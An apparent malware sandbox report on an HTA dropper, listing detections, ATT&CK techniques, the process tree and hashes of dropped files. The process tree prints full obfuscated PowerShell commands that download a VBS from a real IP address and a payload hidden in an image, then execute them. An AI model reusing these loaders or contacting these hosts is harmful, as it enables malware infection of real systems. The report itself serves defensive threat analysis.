53567cc7f7c6d7d1538b06ce9bc2d61b262c5fe0b491afcbb68b042e4ecb1128

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
04-02-2025 14:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta
Size

14KB
MD5

b6572f3c40c7c1f48cf6d3cf6383e58d
SHA1

ef572061a9b3a4bf0a1b1df74357edc4f810c039
SHA256

53567cc7f7c6d7d1538b06ce9bc2d61b262c5fe0b491afcbb68b042e4ecb1128
SHA512

1df142f5f3e71a93d41452ae666003c173de45395501c75dd9405813ec10600e5f674e5647e6c1b6f7f53b90e5b2687c951c4fecc2e19332bc93a614e3efd8f0
SSDEEP

96:fLgCkOWCkoT+aKau28uaDrUgrUCicCkbZ+:0CkVCkoT+aKarp/kCkk

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	544	powershell.exe
6	2704	powershell.exe
8	2704	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
316	cmd.exe
544	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2704	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
544	powershell.exe
2704	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	544	powershell.exe
Token: SeDebugPrivilege	2704	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 3012 wrote to memory of 316	3012	mshta.exe	30
PID 3012 wrote to memory of 316	3012	mshta.exe	30
PID 3012 wrote to memory of 316	3012	mshta.exe	30
PID 3012 wrote to memory of 316	3012	mshta.exe	30
PID 316 wrote to memory of 544	316	cmd.exe	32
PID 316 wrote to memory of 544	316	cmd.exe	32
PID 316 wrote to memory of 544	316	cmd.exe	32
PID 316 wrote to memory of 544	316	cmd.exe	32
PID 544 wrote to memory of 2724	544	powershell.exe	33
PID 544 wrote to memory of 2724	544	powershell.exe	33
PID 544 wrote to memory of 2724	544	powershell.exe	33
PID 544 wrote to memory of 2724	544	powershell.exe	33
PID 2724 wrote to memory of 2760	2724	csc.exe	34
PID 2724 wrote to memory of 2760	2724	csc.exe	34
PID 2724 wrote to memory of 2760	2724	csc.exe	34
PID 2724 wrote to memory of 2760	2724	csc.exe	34
PID 544 wrote to memory of 2912	544	powershell.exe	36
PID 544 wrote to memory of 2912	544	powershell.exe	36
PID 544 wrote to memory of 2912	544	powershell.exe	36
PID 544 wrote to memory of 2912	544	powershell.exe	36
PID 2912 wrote to memory of 2704	2912	WScript.exe	37
PID 2912 wrote to memory of 2704	2912	WScript.exe	37
PID 2912 wrote to memory of 2704	2912	WScript.exe	37
PID 2912 wrote to memory of 2704	2912	WScript.exe	37

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:3012
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c pOWershell.exe -ex bypASS -NOP -w 1 -C DeviCECredEnTiaLdeploYmeNt ; iEX($(IEx('[sYStEM.TEXT.encOdinG]'+[cHar]0x3a+[ChAR]0X3a+'UtF8.GetstrING([SYSTeM.CoNVERt]'+[chaR]0X3a+[chAr]0X3A+'fROMbASe64sTrING('+[ChAr]34+'JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWRjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExvS2Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdWlDeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1ZzdFpkblYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWJPY0x4KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWU5aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGb3VoICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHa29QeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi80MzAvZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29kLmdJRiIsIiRlTnY6QVBQREFUQVxnb29kZ2lybGFsd2F5c2JlYWdvb2RnaXJsd2l0aGJldHRlcnBlcnNvbmdvb2dpcmx3aXRoLnZicyIsMCwwKTtTdEFSVC1zbGVFcCgzKTtJbnZPa2UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29naXJsd2l0aC52YnMi'+[ChAr]34+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:316
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOWershell.exe -ex bypASS -NOP -w 1 -C DeviCECredEnTiaLdeploYmeNt ; iEX($(IEx('[sYStEM.TEXT.encOdinG]'+[cHar]0x3a+[ChAR]0X3a+'UtF8.GetstrING([SYSTeM.CoNVERt]'+[chaR]0X3a+[chAr]0X3A+'fROMbASe64sTrING('+[ChAr]34+'JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWRjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExvS2Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdWlDeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1ZzdFpkblYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWJPY0x4KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWU5aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGb3VoICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHa29QeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi80MzAvZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29kLmdJRiIsIiRlTnY6QVBQREFUQVxnb29kZ2lybGFsd2F5c2JlYWdvb2RnaXJsd2l0aGJldHRlcnBlcnNvbmdvb2dpcmx3aXRoLnZicyIsMCwwKTtTdEFSVC1zbGVFcCgzKTtJbnZPa2UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29naXJsd2l0aC52YnMi'+[ChAr]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:544
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gcvyt6vc.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2724
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES97ED.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC97EC.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2760
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\goodgirlalwaysbeagoodgirlwithbetterpersongoogirlwith.vbs"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2912
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZQBpAHQAcwBlAGIAeQBtAHIAbwBmAGQAbwBvAGcAcwBzAGUAbgB0AGEAZQByAGcAaAB0AGkAdwBzAGcAbgBpAGgAdAB0AHMAZQBiAGUAaAB0AGUAZQBzAC8AMAAzADQALwAyADcALgA3AC4AOAA2ADEALgA0ADAAMQAvAC8AOgBwAHQAdABoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAYQB4AHcAdQBhADYAMwB5AC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADgAMwAzADQANQAzADMALwBhAGwAYwBiADQAaAB0AG8AbAB6AHYAZgBoAHoAegB1AGYAcQBoADUALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAEMAYQBzAFAAbwBsACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2704

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CabB444.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES97ED.tmp

Filesize
1KB

MD5
0d49aa61c59d9830269af3f2c1d9ee39

SHA1
884f1750f2ffacf42767829f5f28925ab333539f

SHA256
ad147c3f1cb57562f62dd4c70cf365624a6e4b626b04b72d12b800c1d6f28464

SHA512
26e6cc5320b95b63beddf049b298991a12422345ea259b3aefdadbf158647748f8a31e874504790ff2cfe67c39b805e155283eeaa0c247d0e27fd8a84265ccc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarB476.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\gcvyt6vc.dll

Filesize
3KB

MD5
738ca3d2ac58e4c1e843f5c8e8e8ac0a

SHA1
40fbab7bb9aca5ad539d5002b68eb049d9ea9803

SHA256
22c6e4906997c9eabcb453108fd3354cffcc34377f10295248db2b121148ceb7

SHA512
9cacb6c28beb522c41c7dd4554859545eed5408bec2f7077460e2707dd8119f86dad94c34d34542df7607502bc20d209c0f459a6ecbefcbe90e818c4d75dfbe7

Download Submit
C:\Users\Admin\AppData\Local\Temp\gcvyt6vc.pdb

Filesize
7KB

MD5
b2c1abe1877f5066e81276a793014b46

SHA1
c9f57a5d7a5e7d056752f6887def4eef5dd63d2f

SHA256
e5cdf9f294d87fe6ec031964430fe65c7f7abf110f696fdb82c0b3edc5e1bf15

SHA512
96a599f23c33b615d6bd3669353f513f57374ade1be38dca7b4e505083fdd3b13041690ce1f72b9222c3f298b39c081b247043f8068d4902bdc79d5be52625af

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
b49a5281ff710fadf3b779066a5002e5

SHA1
184327cdd65a71979d2cce1604e201abea6f1733

SHA256
b7d8f728f2ccf9f8c9363357959911c06366990eecddeae8dc130bdccd6e6919

SHA512
9d8c51049c081adbd219f33707d4af8bf3825dc40755b92ac24c39bf8cc9b862ff2f54cf8093b87411852ec1fbbe4e94cef128905ddad2d0ac8d44c102d422c3

Download Submit
C:\Users\Admin\AppData\Roaming\goodgirlalwaysbeagoodgirlwithbetterpersongoogirlwith.vbs

Filesize
223KB

MD5
333ba8d914c321df855e5b74274f38d0

SHA1
e5d512a9c1d7c5be82bf4fd4e9b5dea83793ca79

SHA256
048099ca7e2e55ad822eb367fcc5b7e5ecf98557651825a03c34ca8373120139

SHA512
50699c6433d0d541658d8a419f3a240b49c60b06352fc5f9d61008decf647f03e40a2afcc20c1ba5855ae34eb7c45dec52c4f7ab46d81bafa9e7be83a006fe7f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC97EC.tmp

Filesize
652B

MD5
a3af4855061fe0bcdd5b469c1dfc0097

SHA1
2d442fa8892778a69ea08f16c0d31d834594e754

SHA256
81fc67058c81f544600ad9e18458482a88a1eab46831f845c5f278480be19df7

SHA512
30c27c143a15db34801b5c6475d77cfa848ab75cbc590ab8b5aca123d275000b13d0ae593d53e9e47aaa3177e6b514d0af6a264e946a02b876d14159c9f58ed0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gcvyt6vc.0.cs

Filesize
465B

MD5
7da95fb8f830258ef72b0f5c7b4d425c

SHA1
c625a70e4f81b9e04b7d95479e37c90e9c8f4f71

SHA256
59fb5ee2f23beec8c2623d2686a7b52d2eaf786f90869990d525facc2a2da7fa

SHA512
039be9d1aabc4e450ab1ffe219425f21e3938fc530899863908c4900545275d5468659fd1cd0665a05d521f81eca17417b8f82e8eea102ddca08c0c82cc05926

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gcvyt6vc.cmdline

Filesize
309B

MD5
72e666ebef676e4a3d9a101855fd0240

SHA1
d2fdc773c7c18d9e073686a8e516f946b450d8bd

SHA256
8d9ed5cef70790486be178eeb7aca3c5067a5330790c83be36309876f558c418

SHA512
a0145e9f665ca2dc0ac3796e7247637365e3f2bdf8a4da0e41bdada9454eb77aa62633c53c626211098a6a82e8489b5317c93af3ffb34510075ffd60670d0c7c

Download Submit